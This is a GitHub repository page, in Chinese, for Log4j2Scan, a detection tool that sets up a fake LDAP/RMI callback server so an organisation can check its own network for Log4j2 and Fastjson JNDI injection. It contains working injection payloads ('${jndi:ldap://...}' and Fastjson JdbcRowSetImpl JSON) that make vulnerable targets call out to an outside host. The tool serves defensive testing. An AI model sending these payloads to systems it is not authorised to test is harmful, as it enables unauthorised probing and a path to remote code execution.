Skip to content

一款无须借助dnslog且完全无害的log4j2反连检测工具,解析RMI和LDAP协议实现,可用于甲方内网自查

License

Notifications You must be signed in to change notification settings

j5s/Log4j2Scan

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Log4j2Scan

介绍

这是什么?

该项目一款无须借助dnslog且完全无害的log4j2反连检测工具,解析RMILDAP协议实现,可用于甲方内网自查

特点:

  • Golang编写,直接运行可执行文件进行检测
  • 动态渲染数据到web页面,方便观察结果

使用

使用${jndi:ldap://ip:端口/}这样的Payload

如果目标存在漏洞,该项目就会收到ldap/rmi请求,从而快速定位哪些目标存在漏洞

Demo

根据自己操作系统下载对应的可执行文件:下载地址

命令:./Log4j2Scan -p port(默认8001) -wp webport(默认8888)

    __                __ __  _ _____
   / /   ____  ____ _/ // / (_) ___/_________ _____
  / /   / __ \/ __ `/ // /_/ /\__ \/ ___/ __ `/ __ \
 / /___/ /_/ / /_/ /__  __/ /___/ / /__/ /_/ / / / /
/_____/\____/\__, /  /_/_/ //____/\___/\__,_/_/ /_/
 /____/    /___/
    coded by 天下大木头 & 4ra1n
[+] [16:36:26] use port: 8000
[+] [16:36:26] use http port: 8888
[+] [16:36:26] start fake reverse server
[+] [16:36:26] start result http server
|------------------------------------|
|--Payload: ldap/rmi://your-ip:port--|
|------------------------------------|

只需要将Payload设置为:ldap://your-ip:portrmi://your-ip:port

然后访问:localhost:8888即可动态查看最新结果

拓展

不止用于Log4j2框架,也可用于检测存在JNDI注入的其他框架

例如Fastjson的检测:

{
	"@type": "com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName": "rmi://your-ip:port",
	"autoCommit": true
}

{
	"@type": "com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName": "ldap://your-ip:port",
	"autoCommit": true
}

About

一款无须借助dnslog且完全无害的log4j2反连检测工具,解析RMI和LDAP协议实现,可用于甲方内网自查

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Go 99.7%
  • Batchfile 0.3%